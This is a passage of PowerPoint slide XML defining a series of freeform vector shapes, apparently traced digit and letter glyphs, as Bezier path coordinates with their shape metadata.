                    <a:pt x="86" y="295"/>
                    <a:pt x="44" y="288"/>
                    <a:pt x="27" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="254"/>
                    <a:pt x="35" y="252"/>
                    <a:pt x="35" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="234"/>
                    <a:pt x="27" y="226"/>
                    <a:pt x="17" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="226"/>
                    <a:pt x="0" y="233"/>
                    <a:pt x="0" y="246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2"/>
                    <a:pt x="214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0" name="Freeform 1166">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA2C3430-6F5D-47F8-A6CE-F095A33C60B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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4635500" y="1658938"/>
              <a:ext cx="20638" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 55 w 55"/>
                <a:gd name="T1" fmla="*/ 28 h 55"/>
                <a:gd name="T2" fmla="*/ 28 w 55"/>
                <a:gd name="T3" fmla="*/ 0 h 55"/>
                <a:gd name="T4" fmla="*/ 0 w 55"/>
                <a:gd name="T5" fmla="*/ 27 h 55"/>
                <a:gd name="T6" fmla="*/ 27 w 55"/>
                <a:gd name="T7" fmla="*/ 55 h 55"/>
                <a:gd name="T8" fmla="*/ 55 w 55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1" name="Freeform 1167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FC97F6D-37CF-4D6C-AB9A-DC72F8F6B123}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId163"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4699000" y="1560513"/>
              <a:ext cx="90488" cy="1206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1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2" name="Freeform 1168">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F69B1451-D4E6-467E-827E-9C882C4AA45E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4805362" y="1557338"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 215"/>
                <a:gd name="T1" fmla="*/ 20 h 319"/>
                <a:gd name="T2" fmla="*/ 199 w 215"/>
                <a:gd name="T3" fmla="*/ 9 h 319"/>
                <a:gd name="T4" fmla="*/ 26 w 215"/>
                <a:gd name="T5" fmla="*/ 9 h 319"/>
                <a:gd name="T6" fmla="*/ 13 w 215"/>
                <a:gd name="T7" fmla="*/ 0 h 319"/>
                <a:gd name="T8" fmla="*/ 0 w 215"/>
                <a:gd name="T9" fmla="*/ 17 h 319"/>
                <a:gd name="T10" fmla="*/ 0 w 215"/>
                <a:gd name="T11" fmla="*/ 38 h 319"/>
                <a:gd name="T12" fmla="*/ 13 w 215"/>
                <a:gd name="T13" fmla="*/ 54 h 319"/>
                <a:gd name="T14" fmla="*/ 26 w 215"/>
                <a:gd name="T15" fmla="*/ 30 h 319"/>
                <a:gd name="T16" fmla="*/ 179 w 215"/>
                <a:gd name="T17" fmla="*/ 30 h 319"/>
                <a:gd name="T18" fmla="*/ 65 w 215"/>
                <a:gd name="T19" fmla="*/ 300 h 319"/>
                <a:gd name="T20" fmla="*/ 78 w 215"/>
                <a:gd name="T21" fmla="*/ 319 h 319"/>
                <a:gd name="T22" fmla="*/ 90 w 215"/>
                <a:gd name="T23" fmla="*/ 305 h 319"/>
                <a:gd name="T24" fmla="*/ 213 w 215"/>
                <a:gd name="T25" fmla="*/ 26 h 319"/>
                <a:gd name="T26" fmla="*/ 215 w 215"/>
                <a:gd name="T27" fmla="*/ 2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5" h="319">
                  <a:moveTo>
                    <a:pt x="215" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="9"/>
                    <a:pt x="205" y="9"/>
                    <a:pt x="199" y="9"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="26" y="9"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="13" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="38"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="13" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="54"/>
                    <a:pt x="26" y="46"/>
                    <a:pt x="26" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="179" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="133"/>
                    <a:pt x="65" y="244"/>
                    <a:pt x="65" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="306"/>
                    <a:pt x="65" y="319"/>
                    <a:pt x="78" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="319"/>
                    <a:pt x="90" y="315"/>
                    <a:pt x="90" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="156"/>
                    <a:pt x="173" y="64"/>
                    <a:pt x="213" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="24"/>
                    <a:pt x="215" y="22"/>
                    <a:pt x="21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3" name="Freeform 1169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3228ED38-81C7-407E-A139-29562C2879EB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4905375" y="1560513"/>
              <a:ext cx="73025" cy="119063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4" name="Freeform 1170">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC12F90A-2875-4B4F-8036-AE4AFB19A8A0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011737" y="1595438"/>
              <a:ext cx="73025" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 193 w 193"/>
                <a:gd name="T1" fmla="*/ 166 h 220"/>
                <a:gd name="T2" fmla="*/ 180 w 193"/>
                <a:gd name="T3" fmla="*/ 156 h 220"/>
                <a:gd name="T4" fmla="*/ 169 w 193"/>
                <a:gd name="T5" fmla="*/ 160 h 220"/>
                <a:gd name="T6" fmla="*/ 111 w 193"/>
                <a:gd name="T7" fmla="*/ 199 h 220"/>
                <a:gd name="T8" fmla="*/ 26 w 193"/>
                <a:gd name="T9" fmla="*/ 110 h 220"/>
                <a:gd name="T10" fmla="*/ 114 w 193"/>
                <a:gd name="T11" fmla="*/ 21 h 220"/>
                <a:gd name="T12" fmla="*/ 151 w 193"/>
                <a:gd name="T13" fmla="*/ 31 h 220"/>
                <a:gd name="T14" fmla="*/ 168 w 193"/>
                <a:gd name="T15" fmla="*/ 51 h 220"/>
                <a:gd name="T16" fmla="*/ 186 w 193"/>
                <a:gd name="T17" fmla="*/ 33 h 220"/>
                <a:gd name="T18" fmla="*/ 114 w 193"/>
                <a:gd name="T19" fmla="*/ 0 h 220"/>
                <a:gd name="T20" fmla="*/ 0 w 193"/>
                <a:gd name="T21" fmla="*/ 110 h 220"/>
                <a:gd name="T22" fmla="*/ 108 w 193"/>
                <a:gd name="T23" fmla="*/ 220 h 220"/>
                <a:gd name="T24" fmla="*/ 193 w 193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20">
                  <a:moveTo>
                    <a:pt x="193" y="166"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="156"/>
                    <a:pt x="182" y="156"/>
                    <a:pt x="180" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="156"/>
                    <a:pt x="172" y="157"/>
                    <a:pt x="169" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="172"/>
                    <a:pt x="152" y="199"/>
                    <a:pt x="111" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="199"/>
                    <a:pt x="26" y="160"/>
                    <a:pt x="26" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="84"/>
                    <a:pt x="41" y="21"/>
                    <a:pt x="114" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="21"/>
                    <a:pt x="151" y="26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8" y="51"/>
                    <a:pt x="186" y="44"/>
                    <a:pt x="186" y="33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30" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="169"/>
                    <a:pt x="47" y="220"/>
                    <a:pt x="108" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="220"/>
                    <a:pt x="193" y="174"/>
                    <a:pt x="193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5" name="Freeform 1171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{319B90A3-8274-47CC-B418-FD879B0D5B07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6987" y="1560513"/>
              <a:ext cx="79375" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 206 w 206"/>
                <a:gd name="T1" fmla="*/ 212 h 310"/>
                <a:gd name="T2" fmla="*/ 110 w 206"/>
                <a:gd name="T3" fmla="*/ 115 h 310"/>
                <a:gd name="T4" fmla="*/ 44 w 206"/>
                <a:gd name="T5" fmla="*/ 133 h 310"/>
                <a:gd name="T6" fmla="*/ 44 w 206"/>
                <a:gd name="T7" fmla="*/ 21 h 310"/>
                <a:gd name="T8" fmla="*/ 173 w 206"/>
                <a:gd name="T9" fmla="*/ 21 h 310"/>
                <a:gd name="T10" fmla="*/ 188 w 206"/>
                <a:gd name="T11" fmla="*/ 11 h 310"/>
                <a:gd name="T12" fmla="*/ 173 w 206"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 34 w 206"/>
                <a:gd name="T15" fmla="*/ 0 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 206"/>
                <a:gd name="T17" fmla="*/ 16 h 310"/>
                <a:gd name="T18" fmla="*/ 18 w 206"/>
                <a:gd name="T19" fmla="*/ 153 h 310"/>
                <a:gd name="T20" fmla="*/ 30 w 206"/>
                <a:gd name="T21" fmla="*/ 169 h 310"/>
                <a:gd name="T22" fmla="*/ 39 w 206"/>
                <a:gd name="T23" fmla="*/ 166 h 310"/>
                <a:gd name="T24" fmla="*/ 110 w 206"/>
                <a:gd name="T25" fmla="*/ 136 h 310"/>
                <a:gd name="T26" fmla="*/ 181 w 206"/>
                <a:gd name="T27" fmla="*/ 212 h 310"/>
                <a:gd name="T28" fmla="*/ 96 w 206"/>
                <a:gd name="T29" fmla="*/ 289 h 310"/>
                <a:gd name="T30" fmla="*/ 28 w 206"/>
                <a:gd name="T31" fmla="*/ 251 h 310"/>
                <a:gd name="T32" fmla="*/ 36 w 206"/>
                <a:gd name="T33" fmla="*/ 235 h 310"/>
                <a:gd name="T34" fmla="*/ 18 w 206"/>
                <a:gd name="T35" fmla="*/ 217 h 310"/>
                <a:gd name="T36" fmla="*/ 0 w 206"/>
                <a:gd name="T37" fmla="*/ 237 h 310"/>
                <a:gd name="T38" fmla="*/ 96 w 206"/>
                <a:gd name="T39" fmla="*/ 310 h 310"/>
                <a:gd name="T40" fmla="*/ 206 w 206"/>
                <a:gd name="T41" fmla="*/ 2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310">
                  <a:moveTo>
                    <a:pt x="206" y="212"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="162"/>
                    <a:pt x="168" y="115"/>
                    <a:pt x="110" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="115"/>
                    <a:pt x="72" y="118"/>
                    <a:pt x="44" y="133"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="44" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="21"/>
                    <a:pt x="188" y="21"/>
                    <a:pt x="188" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="0"/>
                    <a:pt x="179" y="0"/>
                    <a:pt x="173" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="18" y="3"/>
                    <a:pt x="18" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="160"/>
                    <a:pt x="18" y="169"/>
                    <a:pt x="30" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="169"/>
                    <a:pt x="37" y="168"/>
                    <a:pt x="39" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="146"/>
                    <a:pt x="79" y="136"/>
                    <a:pt x="110" y="136"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="136"/>
                    <a:pt x="181" y="176"/>
                    <a:pt x="181" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="256"/>
                    <a:pt x="142" y="289"/>
                    <a:pt x="96" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="289"/>
                    <a:pt x="45" y="284"/>
                    <a:pt x="28" y="251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="246"/>
                    <a:pt x="36" y="243"/>
                    <a:pt x="36" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="223"/>
                    <a:pt x="26" y="217"/>
                    <a:pt x="18" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="217"/>
                    <a:pt x="0" y="221"/>
                    <a:pt x="0" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="277"/>
                    <a:pt x="41" y="310"/>
                    <a:pt x="96" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="310"/>
                    <a:pt x="206" y="266"/>
                    <a:pt x="206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6" name="Freeform 1172">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CBA355A-21AD-479F-9B7F-AD546B7C2020}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId168"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5205412" y="1595438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4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6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4 w 232"/>
                <a:gd name="T31" fmla="*/ 153 h 220"/>
                <a:gd name="T32" fmla="*/ 131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4 w 232"/>
                <a:gd name="T39" fmla="*/ 104 h 220"/>
                <a:gd name="T40" fmla="*/ 154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7" name="Freeform 1173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4565BFD6-B1D5-4E32-BA0F-BAA4CAFD33AB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311775" y="1595438"/>
              <a:ext cx="73025" cy="85725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6 h 220"/>
                <a:gd name="T4" fmla="*/ 169 w 192"/>
                <a:gd name="T5" fmla="*/ 160 h 220"/>
                <a:gd name="T6" fmla="*/ 111 w 192"/>
                <a:gd name="T7" fmla="*/ 199 h 220"/>
                <a:gd name="T8" fmla="*/ 25 w 192"/>
                <a:gd name="T9" fmla="*/ 110 h 220"/>
                <a:gd name="T10" fmla="*/ 114 w 192"/>
                <a:gd name="T11" fmla="*/ 21 h 220"/>
                <a:gd name="T12" fmla="*/ 150 w 192"/>
                <a:gd name="T13" fmla="*/ 31 h 220"/>
                <a:gd name="T14" fmla="*/ 168 w 192"/>
                <a:gd name="T15" fmla="*/ 51 h 220"/>
                <a:gd name="T16" fmla="*/ 186 w 192"/>
                <a:gd name="T17" fmla="*/ 33 h 220"/>
                <a:gd name="T18" fmla="*/ 114 w 192"/>
                <a:gd name="T19" fmla="*/ 0 h 220"/>
                <a:gd name="T20" fmla="*/ 0 w 192"/>
                <a:gd name="T21" fmla="*/ 110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7"/>
                    <a:pt x="169" y="160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5" y="199"/>
                    <a:pt x="25" y="160"/>
                    <a:pt x="25" y="110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0" y="26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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="3"/>
                    <a:pt x="135" y="0"/>
                    <a:pt x="114" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="169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8" name="Freeform 1174">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7FAC29-D97A-4E90-B5FF-8BBB240F7343}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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5407025" y="1558925"/>
              <a:ext cx="79375" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 209 w 209"/>
                <a:gd name="T1" fmla="*/ 159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9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9"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="66"/>
                    <a:pt x="159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0" y="316"/>
                    <a:pt x="209" y="249"/>
                    <a:pt x="209" y="159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9" name="Freeform 1175">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BCBDF7-9C5B-4366-A5F8-36FBE4642773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537200" y="1658938"/>
              <a:ext cx="20638" cy="20638"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 54 w 54"/>
                <a:gd name="T1" fmla="*/ 28 h 55"/>
                <a:gd name="T2" fmla="*/ 28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0" name="Freeform 1176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58DDC550-1131-4C41-A633-A44D42051885}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId172"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5599112" y="1560513"/>
              <a:ext cx="90488" cy="1206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3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5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1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7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7" y="111"/>
                    <a:pt x="210" y="151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1" name="Freeform 1177">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F14A8C8-7510-4591-A4C3-5212E6D9BE57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5705475" y="1557338"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 20 h 319"/>
                <a:gd name="T2" fmla="*/ 199 w 214"/>
                <a:gd name="T3" fmla="*/ 9 h 319"/>
                <a:gd name="T4" fmla="*/ 25 w 214"/>
                <a:gd name="T5" fmla="*/ 9 h 319"/>
                <a:gd name="T6" fmla="*/ 12 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 319"/>
                <a:gd name="T8" fmla="*/ 0 w 214"/>
                <a:gd name="T9" fmla="*/ 17 h 319"/>
                <a:gd name="T10" fmla="*/ 0 w 214"/>
                <a:gd name="T11" fmla="*/ 38 h 319"/>
                <a:gd name="T12" fmla="*/ 12 w 214"/>
                <a:gd name="T13" fmla="*/ 54 h 319"/>
                <a:gd name="T14" fmla="*/ 25 w 214"/>
                <a:gd name="T15" fmla="*/ 30 h 319"/>
                <a:gd name="T16" fmla="*/ 178 w 214"/>
                <a:gd name="T17" fmla="*/ 30 h 319"/>
                <a:gd name="T18" fmla="*/ 65 w 214"/>
                <a:gd name="T19" fmla="*/ 300 h 319"/>
                <a:gd name="T20" fmla="*/ 78 w 214"/>
                <a:gd name="T21" fmla="*/ 319 h 319"/>
                <a:gd name="T22" fmla="*/ 90 w 214"/>
                <a:gd name="T23" fmla="*/ 305 h 319"/>
                <a:gd name="T24" fmla="*/ 212 w 214"/>
                <a:gd name="T25" fmla="*/ 26 h 319"/>
                <a:gd name="T26" fmla="*/ 214 w 214"/>
                <a:gd name="T27" fmla="*/ 2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319">
                  <a:moveTo>
                    <a:pt x="214" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="9"/>
                    <a:pt x="205" y="9"/>
                    <a:pt x="199" y="9"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="9"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="15" y="0"/>
                    <a:pt x="12" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="9"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="38"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="45"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="12" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="54"/>
                    <a:pt x="25" y="46"/>
                    <a:pt x="25" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="133"/>
                    <a:pt x="65" y="244"/>
                    <a:pt x="65" y="300"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="306"/>
                    <a:pt x="65" y="319"/>
                    <a:pt x="78" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="319"/>
                    <a:pt x="90" y="315"/>
                    <a:pt x="90" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="156"/>
                    <a:pt x="173" y="64"/>
                    <a:pt x="212" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="24"/>
                    <a:pt x="214" y="22"/>
                    <a:pt x="214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2" name="Freeform 1178">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA7BE6D0-4A69-4B2A-8350-AECB95FC5745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5808662" y="1595438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6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3" name="Freeform 1179">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A3BD81-83F0-494C-9C42-DCF4E5431C4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId175"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5899150" y="1560513"/>
              <a:ext cx="90488" cy="1206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5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7" y="90"/>
                    <a:pt x="95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5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2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2" y="111"/>
                    <a:pt x="137" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="111"/>
                    <a:pt x="210" y="151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4" name="Freeform 1180">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C5B006-70B7-4CB2-AF2D-57164607AD13}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId176"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6005512" y="1558925"/>
              <a:ext cx="82550" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 215 w 215"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 141 w 215"/>
                <a:gd name="T3" fmla="*/ 147 h 316"/>
                <a:gd name="T4" fmla="*/ 208 w 215"/>
                <a:gd name="T5" fmla="*/ 78 h 316"/>
                <a:gd name="T6" fmla="*/ 108 w 215"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 7 w 215"/>
                <a:gd name="T9" fmla="*/ 78 h 316"/>
                <a:gd name="T10" fmla="*/ 75 w 215"/>
                <a:gd name="T11" fmla="*/ 147 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 215"/>
                <a:gd name="T13" fmla="*/ 226 h 316"/>
                <a:gd name="T14" fmla="*/ 108 w 215"/>
                <a:gd name="T15" fmla="*/ 316 h 316"/>
                <a:gd name="T16" fmla="*/ 215 w 215"/>
                <a:gd name="T17" fmla="*/ 226 h 316"/>
                <a:gd name="T18" fmla="*/ 182 w 215"/>
                <a:gd name="T19" fmla="*/ 78 h 316"/>
                <a:gd name="T20" fmla="*/ 108 w 215"/>
                <a:gd name="T21" fmla="*/ 133 h 316"/>
                <a:gd name="T22" fmla="*/ 33 w 215"/>
                <a:gd name="T23" fmla="*/ 78 h 316"/>
                <a:gd name="T24" fmla="*/ 108 w 215"/>
                <a:gd name="T25" fmla="*/ 21 h 316"/>
                <a:gd name="T26" fmla="*/ 182 w 215"/>
                <a:gd name="T27" fmla="*/ 78 h 316"/>
                <a:gd name="T28" fmla="*/ 189 w 215"/>
                <a:gd name="T29" fmla="*/ 225 h 316"/>
                <a:gd name="T30" fmla="*/ 108 w 215"/>
                <a:gd name="T31" fmla="*/ 295 h 316"/>
                <a:gd name="T32" fmla="*/ 26 w 215"/>
                <a:gd name="T33" fmla="*/ 225 h 316"/>
                <a:gd name="T34" fmla="*/ 108 w 215"/>
                <a:gd name="T35" fmla="*/ 159 h 316"/>
                <a:gd name="T36" fmla="*/ 189 w 215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316">
                  <a:moveTo>
                    <a:pt x="215" y="226"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="189"/>
                    <a:pt x="193" y="162"/>
                    <a:pt x="141" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="128"/>
                    <a:pt x="208" y="105"/>
                    <a:pt x="208" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="38"/>
                    <a:pt x="165" y="0"/>
                    <a:pt x="108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9"/>
                    <a:pt x="75" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="162"/>
                    <a:pt x="0" y="189"/>
                    <a:pt x="0" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="274"/>
                    <a:pt x="46" y="316"/>
                    <a:pt x="108" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="316"/>
                    <a:pt x="215" y="274"/>
                    <a:pt x="215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9" y="133"/>
                    <a:pt x="108" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="133"/>
                    <a:pt x="33" y="109"/>
                    <a:pt x="33" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="49"/>
                    <a:pt x="64" y="21"/>
                    <a:pt x="108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4" y="295"/>
                    <a:pt x="108" y="295"/>
